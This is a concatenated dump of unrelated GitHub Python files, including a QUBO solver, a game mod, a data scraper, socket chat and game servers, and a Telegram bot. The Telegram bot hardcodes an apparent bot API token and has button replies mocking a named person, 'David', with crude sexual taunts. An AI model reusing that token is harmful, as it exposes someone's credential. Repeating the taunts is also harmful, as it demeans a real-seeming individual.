if(caracter=='e'):\n #break\n continue\n print(caracter)\n\n","repo_name":"cristian3087/python-basico","sub_path":"6.Ciclos_Condiciones.py","file_name":"6.Ciclos_Condiciones.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14018478557","text":"import dimod\n\nvalues = [['J67', -47.3],\n ['J16', 115.0],\t\t\t\t\t \n ['w7', 546.6], \n ['J01', -246.7], \n ['J25', 342.3],\t\t\t \n ['J02', -108.4],\n ['w0', 320.2],\n ['J26', 978.9],\n ['J12', 96.9],\n ['J56', -514.3],\t\t\t \t\t\t \n ['J36', -201.9],\n ['J06', 53.6],\n ['J34', 667.0],\n ['J24', -499.6],\n ['J35', -821.9],\n ['w2', -747.1],\t\t \t\t\t\t \n ['w3', 627.7],\n ['J17', -564.1],\n ['w1', 38.1],\t\t\t \n ['J07', 880.6],\n ['J03', 938.0],\n ['w5', 910.4],\n ['J57', 837.0],\n ['w6', -747.1],\n ['J14', -240.1],\n ['w4', 984.6],\n ['J04', -48.2],\n ['J05', -595.6],\n ['J45', -379.6],\n ['J47', 708.5],\n ['J15', 547.5],\n ['J46', -697.2],\n ['J37', -312.2],\n ['J13', 651.5],\n ['J27', -117.5],\n ['J23', -548.1]]\n\n#ground state supposed to be -747.1\n\nqubit = list()\nqubitwght = list()\ncoupler = list()\ncouplerwght = list()\n\nfor i in range(len(values)):\n if 'J' in values[i][0]:\n numbers = values[i][0][1:]\n coupler.append(('w{}'.format(numbers[0]),'w{}'.format(numbers[1])))\n couplerwght.append(values[i][1])\n if 'w' in values[i][0]:\n qubit.append(values[i][0])\n qubitwght.append(values[i][1])\n\nqubit_weights = {q:w for q,w in zip(qubit, qubitwght)}\ncoupler_weights = {c:w for c,w in zip(coupler,couplerwght)}\n\noffset = 0\n\nbqm = dimod.BinaryQuadraticModel(qubit_weights, coupler_weights, offset, dimod.BINARY)\nsampler = dimod.ExactSolver()\nresponse = sampler.sample(bqm)\n\ngroundstate = 1000000\nfor sample, energy in response.data(['sample','energy']):\n if energy= 0.01) or (angle <= -0.01):\n angle -= 2 * pi\n if (angle <= 0.01) and (angle >= -0.01):\n if aim is None:\n aim = 'aim'\n as_event('ON_DAMAGE_INDICATOR')\n return\n if aim is not None:\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(StrategicControlMode, 'handleMouseEvent')\ndef strategicHandleMouseEvent(self, dx, dy, dz):\n global aim\n if di:\n for value in di.values():\n angle = BigWorld.camera().direction.yaw + pi - value\n if (angle >= 0.01) or (angle <= -0.01):\n angle -= 2 * pi\n if (angle <= 0.01) and (angle >= -0.01):\n if aim is None:\n aim = 'aim'\n as_event('ON_DAMAGE_INDICATOR')\n return\n if aim is not None:\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(SniperControlMode, 'handleMouseEvent')\ndef sniperHandleMouseEvent(self, dx, dy, dz):\n global aim\n if di:\n for value in di.values():\n angle = BigWorld.camera().direction.yaw + pi - value\n if (angle >= 0.01) or (angle <= -0.01):\n angle -= 2 * pi\n if (angle <= 0.01) and (angle >= -0.01):\n if aim is None:\n aim = 'aim'\n as_event('ON_DAMAGE_INDICATOR')\n return\n if aim is not None:\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@overrideMethod(DamageIndicator, 'getDuration')\ndef DamageIndicator_getDuration(base, self):\n return 12\n\n\n@registerEvent(DamageIndicator, 'showHitDirection')\ndef DamageIndicator_showHitDirection(self, idx, hitData, timeLeft):\n global alpha, di\n di[idx] = hitData.getYaw()\n if alpha == 0:\n alpha = 100\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(DamageIndicator, 'hideHitDirection')\ndef DamageIndicator_hideHitDirection(self, idx):\n global alpha, di\n if idx in di:\n del di[idx]\n if not di and (alpha == 100):\n alpha = 0\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(Vehicle, '_Vehicle__onAppearanceReady')\ndef _Vehicle__onAppearanceReady(self, appearance):\n if self.isPlayerVehicle:\n global alpha, aim, di\n di = {}\n alpha = 0\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@xvm.export('xvm.damageIndicator', deterministic=False)\ndef xvm_damageIndicator():\n return alpha\n\n\n@xvm.export('xvm.damageIndicator_aim', deterministic=False)\ndef xvm_damageIndicator_aim():\n return aim\n","repo_name":"Relhax-Modpack-Team/XvmDependencies","sub_path":"PY/Dependency_XVM_PY_SWF_damageIndicator/res_mods/configs/xvm/py_macro/damage_indicator.py","file_name":"damage_indicator.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24538554829","text":"import logging\nimport logging.handlers\n\nclass Logger () :\n def __init__ (self, logName, logDirectory) :\n self.logger = logging.getLogger(logName)\n self.logger.setLevel(logging.DEBUG)\n\n try:\n os.mkdir(logDirectory)\n self.logger.info(\"Created log directory\")\n except:\n self.logger.info(\"Log directory already exists\")\n \n # create file handler which logs even debug messages\n self.fh = logging.handlers.RotatingFileHandler(logDirectory + \"/\" + logName + \".log\",maxBytes=1000000,backupCount=10)\n self.fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n self.ch = logging.StreamHandler()\n self.ch.setLevel(logging.WARNING)\n # create formatter and add it to the handlers\n self.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n self.fh.setFormatter(self.formatter)\n self.ch.setFormatter(self.formatter)\n # add the handlers to the logger\n self.logger.addHandler(self.fh)\n self.logger.addHandler(self.ch)\n \n def getLogger (self) :\n return self.logger\n\n","repo_name":"muddychris/pvMonitor","sub_path":"utils/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20012433393","text":"import logging\n\nfrom dataall.modules.datasets_base.db.dataset_models import DatasetBucket, Dataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass DatasetBucketRepository:\n\n @staticmethod\n def create_dataset_bucket(\n session,\n dataset: Dataset,\n data: dict = None\n ) -> DatasetBucket:\n bucket = DatasetBucket(\n datasetUri=dataset.datasetUri,\n label=data.get('label'),\n description=data.get('description', 'No description provided'),\n tags=data.get('tags', []),\n S3BucketName=dataset.S3BucketName,\n AwsAccountId=dataset.AwsAccountId,\n owner=dataset.owner,\n region=dataset.region,\n KmsAlias=dataset.KmsAlias,\n imported=dataset.imported,\n importedKmsKey=dataset.importedKmsKey,\n )\n session.add(bucket)\n session.commit()\n return bucket\n\n @staticmethod\n def delete_dataset_buckets(session, dataset_uri) -> bool:\n buckets = (\n session.query(DatasetBucket)\n .filter(DatasetBucket.datasetUri == dataset_uri)\n .all()\n )\n for bucket in buckets:\n session.delete(bucket)\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/modules/datasets/db/dataset_bucket_repositories.py","file_name":"dataset_bucket_repositories.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"} +{"seq_id":"29309864409","text":"dictionary = {\r\n \"JAN\":\"01\",\r\n \"FEB\":\"02\",\r\n \"MAR\" :\"03\",\r\n \"APR\":\"04\",\r\n \"MAY\":\"05\",\r\n \"JUN\":\"06\",\r\n \"JUL\":\"07\",\r\n \"AUG\":\"08\",\r\n \"SEP\":\"09\",\r\n \"OCT\":\"10\",\r\n \"NOV\":\"11\",\r\n \"DEC\":\"12\",\r\n }\r\ndef splitdate():\r\n date = input(\"Enter date in the form dd-mmm-yy: \")\r\n split = date.split(\"-\")\r\n return split\r\n\r\n\r\nif __name__ == \"__main__\":\r\n x = splitdate()\r\n print(x)\r\n print(x[0])\r\n print(dictionary[x[1]])\r\n print(x[2])\r\n \r\n \r\n","repo_name":"ZyadOsman/Programming-Challenges","sub_path":"Dictionary Challenge 1/Dictionary Challenge 1.py","file_name":"Dictionary Challenge 1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36497156963","text":"import json\nimport socket\nfrom threading import Thread\n\nfrom raft_py.raft import RaftCluster\n\n\nif __name__ == \"__main__\":\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind(('0.0.0.0', 80))\n serversocket.listen(5)\n raft_cluster = RaftCluster()\n raft_cluster.start()\n\n def set_on_cluster(**kwargs):\n raft_cluster.set(**kwargs)\n\n def create_set_thread(clientsocket):\n data = clientsocket.recv(2048)\n payload = json.loads(data)\n return Thread(target= lambda: raft_cluster.set(**payload))\n\n while True:\n try:\n clientsocket, address = serversocket.accept()\n ct = create_set_thread(clientsocket)\n ct.run()\n except KeyboardInterrupt:\n break\n\n raft_cluster.stop()\n raft_cluster._events[\"stopped\"].wait()\n","repo_name":"astepe/raft","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19528521377","text":"from flask import Flask, redirect, url_for\napp = Flask(__name__)\n\n\njsonString = ''' \n{\n \"service_name\": \"myapplication\",\n \"version\": \"1.0.0\",\n \"git_commit_sha\" :\"abc5789789\",\n \"environment\" : {\n \"service_port\":\"8080\",\n \"log_level\":\"INFO\"\n }\n}'''\n\n@app.route('/info')\ndef processInfo():\n return jsonString\n\nif __name__ == '__main__':\n app.run(host ='0.0.0.0', port = 5001, debug = True)\n","repo_name":"balu-balaji/devops-new","sub_path":"InfoApp.py","file_name":"InfoApp.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17230306430","text":"import datetime\nimport os\nimport json\nfrom StringIO import StringIO\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\n\nimport requests\nfrom dateutil.parser import parse as datetime_parse\n\nimport pandas as pd\n\n\ndef scrape_market(market_id):\n\n r = requests.get(\n 'https://www.predictit.org/Resource/DownloadMarketChartData',\n params={'marketid': market_id, 'timespan': '24h'})\n\n strio = StringIO()\n strio.write(r.content)\n strio.seek(0)\n\n df = pd.read_csv(strio)\n\n latest_timepoint = df['DateString'].min()\n return df[df['DateString'] == latest_timepoint]\n\n\nstarttime = datetime.datetime.now()\n\n# URL = 'https://www.predictit.org/Resource/DownloadMarketChartData\\?marketid\\=3633\\×pan\\=7d'\n\nURL = \"https://www.predictit.org/api/marketdata/all/\"\nresponse = requests.get(URL)\nall_markets = json.loads(response.text)['markets']\n\n\nengine = sqlalchemy.create_engine('sqlite:///' + os.getcwd() + '/pita.db')\nbase = automap_base()\nbase.prepare(engine, reflect=True)\nContracts = base.classes.Contracts\nVolumes = base.classes.Volumes\nsession = Session(engine)\n\nfor market_id in (k['id'] for k in all_markets):\n\n latest_values = scrape_market(market_id)\n\n for i, vals in latest_values.iterrows():\n\n timestamp = datetime_parse(vals['DateString'])\n contract_id = session.query(Contracts.contract_id)\\\n .filter_by(contract_predictit_id=vals['ContractId'])\\\n .scalar()\n\n row_exists = (session.query(Volumes.contract_id, Volumes.time_stamp)\n .filter(Volumes.time_stamp == timestamp)\n .filter(Volumes.contract_id == contract_id)\n .count()) >= 1\n\n if not row_exists:\n\n newprice = Volumes(\n contract_id=contract_id,\n open_share_price=vals['OpenSharePrice'],\n high_share_price=vals['HighSharePrice'],\n low_share_price=vals['LowSharePrice'],\n close_share_price=vals['CloseSharePrice'],\n volume=vals['TradeVolume'],\n time_stamp=timestamp)\n\n session.add(newprice)\nsession.commit()\n","repo_name":"Talophex/PITA","sub_path":"ScrapeVolumeData.py","file_name":"ScrapeVolumeData.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"12916824183","text":"from CodingInterviewGuide.C3_binary_tree import *\n\ntree = Node(1,\n Node(2,\n Node(4),\n Node(5)),\n Node(3,\n Node(6),\n Node(7)))\n\n\ndef pre_order_recur(root):\n if root:\n print(root)\n pre_order_recur(root.left)\n pre_order_recur(root.right)\n\n\ndef in_order_recur(root):\n if root:\n in_order_recur(root.left)\n print(root)\n in_order_recur(root.right)\n\n\ndef pos_order_recur(root):\n if root:\n pos_order_recur(root.left)\n pos_order_recur(root.right)\n print(root)\n\n\ndef pre_order_non_recur(root):\n stack = [root] if root else []\n\n while stack:\n cur = stack.pop()\n print(cur)\n if cur.right:\n stack.append(cur.right)\n if cur.left:\n stack.append(cur.left)\n\n\ndef in_order_non_recur(root):\n stack = Stack()\n stack.push(root)\n\n left_child_visited_nodes = set()\n\n while stack:\n top = stack.peek()\n if top.left and top not in left_child_visited_nodes:\n stack.push(top.left)\n else:\n cur = stack.pop()\n print(cur)\n if not stack.empty():\n left_child_visited_nodes.add(stack.peek())\n if cur.right:\n stack.push(cur.right)\n\n\nif __name__ == \"__main__\":\n # pre_order_recur(tree)\n # in_order_recur(tree)\n # pos_order_recur(tree)\n # pre_order_non_recur(tree)\n in_order_non_recur(tree)\n","repo_name":"albertmenglongli/Algorithms","sub_path":"CodingInterviewGuide/C3_binary_tree/walk_through.py","file_name":"walk_through.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"12758490623","text":"import yaml\n\n\ncomp_replica = int(snakemake.params.conf[\"comp_replica\"])\nreplica = int(snakemake.params.conf[\"replica\"])\nhyperbolic_dim = int(snakemake.params.conf[\"hyperbolic_dim\"])\nname = snakemake.params.wildcard_pattern.format(\n comp_replica=comp_replica, replica=replica, hyperbolic_dim=hyperbolic_dim\n)\n\nwith open(snakemake.input.plain) as f:\n plain_config = yaml.load(f, Loader=yaml.SafeLoader)\n\nplain_config[\"trainer\"][\"callbacks\"] = [\n {\n \"class_path\": \"pytorch_lightning.callbacks.ModelCheckpoint\",\n \"init_args\": {\n \"monitor\": \"train_loss\",\n \"dirpath\": \"data/mds/models\",\n \"filename\": name,\n \"mode\": \"min\",\n \"save_last\": True,\n },\n },\n]\nplain_config[\"trainer\"][\"logger\"] = {\n \"class_path\": \"pytorch_lightning.loggers.TensorBoardLogger\",\n \"init_args\": {\n \"save_dir\": \"data/mds/tensorboard\",\n \"name\": name,\n },\n}\n\nplain_config[\"model\"][\"replica\"] = replica\nplain_config[\"model\"][\"hyperbolic_dim\"] = hyperbolic_dim\nplain_config[\"model\"][\"data_dir\"] = \"./data/raw/data\"\n\nwith open(snakemake.output.conf, \"w\") as f:\n yaml.dump(plain_config, f)\n","repo_name":"gatoniel/transcription-data-analysis","sub_path":"src/mds_create_configs.py","file_name":"mds_create_configs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37622319406","text":"# XOR(exclusive or) 문제는 선형으로 분류 불가. kernel trick을 사용하는 SVM으로 분류 가능. 차원 증가로 가능해진다.\n\nx_data = [ # xor case\n [0,0,0],\n [0,1,1],\n [1,0,1],\n [1,1,0],\n]\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm, metrics\n\nx_df = pd.DataFrame(x_data)\nfeature = np.array(x_df.iloc[:,0:2])\nlabel = np.array(x_df.iloc[:,2])\nprint(feature)\nprint(label)\n\n# 실습 1 : LogisticRegression\nmodel = LogisticRegression()\nmodel.fit(feature, label)\npred = model.predict(feature)\nprint('예측 -', pred)\nprint('실제 -', label)\nprint('정확도 : ', metrics.accuracy_score(label, pred)) # 정확도 : 0.75\nprint(\"-------\"*20)\n\n# 실습 2 : SVC\nmodel2 = svm.SVC(C=1) # C 인자는 과적합 방지를 위해 넣어준다.\n# model2 = svm.LinearSVC(C=1) # SVC에 비해 속도가 향상\nmodel2.fit(feature, label)\npred2 = model2.predict(feature)\nprint('예측 -', pred2)\nprint('���제 -', label)\nprint('정확도 : ', metrics.accuracy_score(label, pred2)) # 정확도 : 0.75\n\n","repo_name":"Parkjuseong319/test","sub_path":"pypro2anal3/anal3_classification/cla15_SVM.py","file_name":"cla15_SVM.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20108530956","text":"#!/usr/bin/env python\r\n\"\"\"\r\n\r\nGetter Setter Generator\r\n\r\nSam Zielke-Ryner (samzielkeryner@gmail.com)\r\n\r\n\"\"\"\r\n\r\n\r\nimport wx\r\n\r\n\r\nclass FileDrop( wx.FileDropTarget ):\r\n\r\n ## Class Functions: ##\r\n\r\n def __init__( self, _window, _parent_frame ):\r\n \"\"\" Constructor: \"\"\"\r\n\r\n wx.FileDropTarget.__init__( self )\r\n\r\n self.window = _window\r\n self.parent_frame = _parent_frame\r\n\r\n\r\n def OnDropFiles( self, x, y, fileNames ):\r\n \"\"\" Post: This function is called when a file is dragged & dropped\r\n onto the input TextCtrl widget. This function informs\r\n the View component that the source code has been changed\r\n (if it is valid). \"\"\"\r\n\r\n # if a folder/directory has not been dropped onto the window/TextCtrl\r\n if len( fileNames ) == 1:\r\n\r\n # event = wx.DropFilesEvent( id=wx.wxEVT_DROP_FILES, noFiles=len(fileNames), file=fileNames[0] )\r\n self.parent_frame.notify_file_drop( fileNames[0] )\r\n\r\n else:\r\n\r\n self.parent_frame.show_error_dialog( \"Input must be a single file & not a directory. \\nPlease try again\" )\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sqzr1/Getter-Setter-Generator","sub_path":"gsg/file_drop.py","file_name":"file_drop.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6163675931","text":"'''\nCitations\nhttps://kdchin.gitbooks.io/sockets-module-manual/content/\nhttps://www.gitbook.com/book/qwewy/pygame-module-manual/details\nhttps://qwewy.gitbooks.io/pygame-module-manual/content/chapter1/framework.html\nhttps://www.reddit.com/r/pygame/comments/3y03c9/how_to_check_if_sprite_group_is\n_empty/?st=jagatxz5&sh=ecede6cf\nhttp://millionthvector.blogspot.com/p/free-sprites.html\nhttps://www.youtube.com/watch?v=EF_8ZFSxgyQ\nhttps://stackoverflow.com/questions/38028970/how-to-assign-sounds-to-channels-in-pygame\nhttps://www.pygame.org/docs/\nhttp://hpr2.org/post/conversation-wednesday-june-21st-2017\nhttps://www.youtube.com/watch?v=t3eh6YiyCoQ\nhttps://www.youtube.com/watch?v=W1xwTqgzQ_g\n'''\n####################################\n# TP3\n# by Calvin ZH Qiao\n# AndrewID: zhuhanq \n####################################\n'''\nGame Goal\nCollect \"1\", \"1\", \"2\" elements in each round from each boss to enter the \n112 planet\n'''\n\nimport socket\nimport threading\nfrom queue import Queue\nimport time\n\nHOST = \"localhost\" # put your IP address here if playing on multiple computers\nPORT = 50003\nBACKLOG = 4\n\ntimer = 0\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver.bind((HOST,PORT))\nserver.listen(BACKLOG)\nprint(\"looking for connection\")\n\ndef handleClient(client, serverChannel, cID, clientele):\n client.setblocking(1)\n msg = \"\"\n while True:\n try:\n msg += client.recv(10).decode(\"UTF-8\")\n command = msg.split(\"\\n\")\n while (len(command) > 1):\n readyMsg = command[0]\n msg = \"\\n\".join(command[1:])\n serverChannel.put(str(cID) + \" \" + readyMsg)\n command = msg.split(\"\\n\")\n except:\n # we failed\n return\n\ndef serverThread(clientele, serverChannel):\n timer = 0\n \n while True:\n timer += 1\n # print(\"timer = \", timer)\n msg = serverChannel.get(True, None)\n # print(\"got here\")\n # print(\"msg recv: \", msg)\n msgList = msg.split(\" \")\n senderID = msgList[0]\n instruction = msgList[1]\n details = \" \".join(msgList[2:])\n if (details != \"\"):\n for cID in clientele:\n if cID != senderID:\n sendMsg = instruction + \" \" + senderID + \" \" + details + \"\\n\"\n clientele[cID].send(sendMsg.encode())\n print(\"> sent to %s:\" % cID, sendMsg[:-1])\n print()\n serverChannel.task_done()\n\nclientele = dict()\nplayerNum = 0\n\nserverChannel = Queue(100)\nthreading.Thread(target = serverThread, args = (clientele, serverChannel)).start()\n\nnames = [\"PlayerOne\", \"PlayerTwo\", \"PlayerThree\", \"PlayerFour\"]\n# only plan to use first two players \n\nwhile True:\n # print(time.time())\n client, address = server.accept()\n # myID is the key to the client in the clientele dictionary\n myID = names[playerNum]\n # print(myID, playerNum)\n for cID in clientele:\n # print (repr(cID), repr(playerNum))\n clientele[cID].send((\"newPlayer %s\\n\" % myID).encode())\n client.send((\"newPlayer %s\\n\" % cID).encode())\n clientele[myID] = client\n client.send((\"myIDis %s \\n\" % myID).encode())\n # print(\"connection recieved from %s\" % myID)\n threading.Thread(target = handleClient, args = \n (client ,serverChannel, myID, clientele)).start()\n playerNum += 1\n","repo_name":"calvinqiao/Multi-Player-Space-Shooting-Game","sub_path":"Game Server.py","file_name":"Game Server.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41012755050","text":"# -*- coding: iso-8859-1 -*-\n\nimport re\n\nclass AgentActionsReader(object):\n\n @staticmethod\n def parse(conf_string):\n # Example: conf_string = 'engine.widgets.actions_on_tree': ActionOnTree\n action_regex = re.search('\"(.*)\"\\s*:\\s*(\\w+)', conf_string.strip(), re.IGNORECASE)\n module = action_regex.group(1)\n className = action_regex.group(2)\n #print(\"module: %s\" % module)\n #print(\"className: %s\" % className)\n module = __import__(module, {}, {}, className)\n actionInstance = getattr(module, className )()\n return actionInstance\n \n","repo_name":"jchome/PSP-SimpleGame","sub_path":"engine/agent_actions_reader.py","file_name":"agent_actions_reader.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36737581093","text":"import telebot\nimport webbrowser\nfrom telebot import types\n\n# assign token to var\nbot = telebot.TeleBot('6406707049:AAE4aPHKzlaafzZ_yjNlnvhw1uenB_Oq4DM')\n\n\n# decorator to interact with /start can put other commands also\n@bot.message_handler(commands=['start']) # commanads in telegram on which execute main()\ndef start(message):\n markup = types.ReplyKeyboardMarkup()\n btn1 = types.KeyboardButton('Who is gay?')\n btn2 = types.KeyboardButton('David Gay')\n btn3 = types.KeyboardButton('David not a gay!')\n markup.row(btn1)\n markup.row(btn2, btn3)\n bot.send_message(message.chat.id, f'Hi! {message.from_user.first_name}', reply_markup=markup)\n # to use buttons register func\n bot.register_next_step_handler(message, on_click)\ndef on_click(message):\n if message.text == 'Who is gay?':\n bot.send_message(message.chat.id, 'David for sure')\n elif message.text == 'David Gay':\n bot.send_message(message.chat.id, 'For sure')\n elif message.text == 'David not a gay!':\n bot.send_message(message.chat.id, 'DAVID LOVE BIG COCKS')\n\n@bot.message_handler(commands=['file']) # commanads in telegram on which execute main()\ndef file(message):\n markup = types.ReplyKeyboardMarkup()\n btn1 = types.KeyboardButton('Nice photo')\n markup.add(btn1)\n file = open('./Astro.png', 'rb')\n # same for video audio etc\n bot.send_photo(message.chat.id, file, reply_markup=markup )\n # to use buttons register func\n bot.register_next_step_handler(message, on_click)\ndef on_click(message):\n if message.text == 'Nice photo':\n bot.send_message(message.chat.id, '❤️')\n\n@bot.message_handler(commands=['help'])\ndef main(message):\n # format msg using html tags\n bot.send_message(message.chat.id, 'Help information', parse_mode='html')\n\n\n@bot.message_handler()\ndef info(message):\n if message.text.lower() == 'hello':\n bot.send_message(message.chat.id, f'Hi! {message.from_user.first_name}')\n elif message.text.lower() == 'id':\n bot.reply_to(message, f'ID {message.from_user.id}')\n\n\n@bot.message_handler(commands=['site', 'website'])\ndef site(message):\n webbrowser.open('https://hackscope.net')\n\n\n# buttons\n@bot.message_handler(content_types=['photo', 'video'])\ndef get_content(message):\n markup = types.InlineKeyboardMarkup()\n btn1 = types.InlineKeyboardButton('Open website', url='https://hackscope.net')\n btn2 = types.InlineKeyboardButton('Delete photo', callback_data='delete')\n btn3 = types.InlineKeyboardButton('Edit text', callback_data='edit')\n markup.row(btn1)\n markup.row(btn2, btn3)\n bot.reply_to(message, 'What a beautiful photo!', reply_markup=markup)\n\n\n# this method process callback_data\n# create anonymous func if empty return true\n@bot.callback_query_handler(func=lambda callback: True)\ndef callback_message(callback):\n if callback.data == 'delete':\n # message_id current msg\n bot.delete_message(callback.message.chat.id, callback.message.message_id - 1)\n elif callback.data == 'edit':\n bot.edit_message_text('Edit text', callback.message.chat.id, callback.message.message_id)\n\n\n# execute code unstoppable\n# or bot.infinity_polling()\nbot.polling(none_stop=True)\n","repo_name":"DANYKORD/kyotobot","sub_path":"msgs_buttons.py","file_name":"msgs_buttons.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37251903712","text":"import pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms as T\n\nfrom PIL import Image\nimport os\n\n\nclass C10IMG_MOBILE(Dataset):\n def __init__(self, transform, data_dir):\n self.transform = transform\n self.data_dir = data_dir\n\n def __len__(self):\n return 5000\n\n def __getitem__(self, item):\n img = Image.open(os.path.join(self.data_dir, str(item)+'.png')).convert('RGB')\n return self.transform(img)\n\n\nclass C10IMGDATA_MOBILE(pl.LightningDataModule):\n def __init__(self, args):\n super().__init__()\n self.hparams = args\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2471, 0.2435, 0.2616)\n\n def dataloader(self):\n transform = T.Compose(\n [\n T.ToTensor(),\n T.Normalize(self.mean, self.std),\n ]\n )\n dataset = C10IMG_MOBILE(transform=transform,\n data_dir=self.hparams.data_dir)\n dataloader = DataLoader(\n dataset,\n batch_size=self.hparams.batch_size,\n )\n return dataloader\n\n\nclass C10IMG(Dataset):\n def __init__(self, transform, model_name, data_dir):\n self.transform = transform\n self.model_name = model_name\n self.data_dir = data_dir\n self.original_path = os.path.join(self.data_dir, 'cifar10')\n self.perturbed_path = os.path.join(self.data_dir, self.model_name)\n self.data_list = os.listdir(self.original_path)\n\n def __len__(self):\n return 5000\n\n def __getitem__(self, index):\n img_name = self.data_list[index]\n original_img = Image.open(os.path.join(self.original_path, img_name)).convert('RGB')\n perturbed_img = Image.open(os.path.join(self.perturbed_path, img_name))\n return self.transform(original_img), self.transform(perturbed_img), int(img_name[-5:-4])\n\n\nclass C10IMGDATA(pl.LightningDataModule):\n def __init__(self, args):\n super().__init__()\n self.hparams = args\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2471, 0.2435, 0.2616)\n\n def dataloader(self):\n transform = T.Compose(\n [\n T.ToTensor(),\n T.Normalize(self.mean, self.std),\n ]\n )\n dataset = C10IMG(transform=transform,\n model_name=self.hparams.model_name,\n data_dir=self.hparams.data_dir)\n dataloader = DataLoader(\n dataset,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n drop_last=True,\n pin_memory=True,\n )\n return dataloader\n","repo_name":"hwsel/ProtectivePerturbation","sub_path":"server/mobile_data.py","file_name":"mobile_data.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18140895640","text":"import socket\nimport threading \nfrom UserManager import UserManager\nimport time\n\nHOST =\"\"\nPORT =9000\nHEADER =64\nFORMAT =\"utf-8\"\nDISCONNECT_MSG =\"[!EXIT]\"\nFILE_HEADER=\"[FILE]\"\nMESSAGE_HEADER=\"[MESG]\"\nbf_size = 65536\n\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver.bind((HOST,PORT))\nuser = UserManager()\n\n\n\ndef runServer():\n print(\"============채팅서버를 시작합니다.============\")\n server.listen()\n print(\"[LISTENING] server is listening\")\n while True:\n conn,addr=server.accept()\n client_info = conn.recv(1024).decode()\n username,password=client_info.split('/')\n #### user 추가하기\n case=user.addUser(username,password,conn,addr)\n if case==1:\n conn.sendall(\"환영\".encode())\n thread = threading.Thread(target=handle_client,args=(username,conn,addr))\n thread.demon=True\n thread.start()\n elif case==2:\n conn.sendall(\"비틀림\".encode())\n elif case==3:\n conn.sendall(\"아중복\".encode())\n elif case==4:\n conn.sendall(\"환영\".encode())\n thread = threading.Thread(target=handle_client,args=(username,conn,addr))\n thread.demon=True\n thread.start()\n \n \n \n\ndef handle_client(username,conn,addr):\n print(f\"[NEW connection ] {addr} connected\")\n connected = True\n while connected:\n try:\n msg = conn.recv(10).decode(FORMAT)\n if msg ==DISCONNECT_MSG:\n connected=False\n print(f\"[{addr}] {msg}\")\n\n if msg == FILE_HEADER:\n #===================파일 헤더 와 info 정보받기===================\n file_info = conn.recv(bf_size).decode()\n #===================파일 정보 보내기 (서버 -> 전체 클라)===================\n user.sendMessageToAll(file_info,2)\n #===================파일 보내기 (서버 -> 전체 클라)===================\n fileSize = int(file_info.split(',')[0])\n count=fileSize//bf_size\n if fileSize%bf_size!=0:\n count+=1\n\n for i in range(count):\n data = conn.recv(bf_size)\n user.sendFileToAll(username,data)\n\n #메세지라면 성공\n if msg == MESSAGE_HEADER:\n msg = conn.recv(1024).decode(FORMAT)\n user.messageHandler(username,msg)\n except Exception as e:\n connected=False\n print(e)\n print('[%s] 접속종료중' %username)\n user.removeUser(username)\n\nif __name__ == 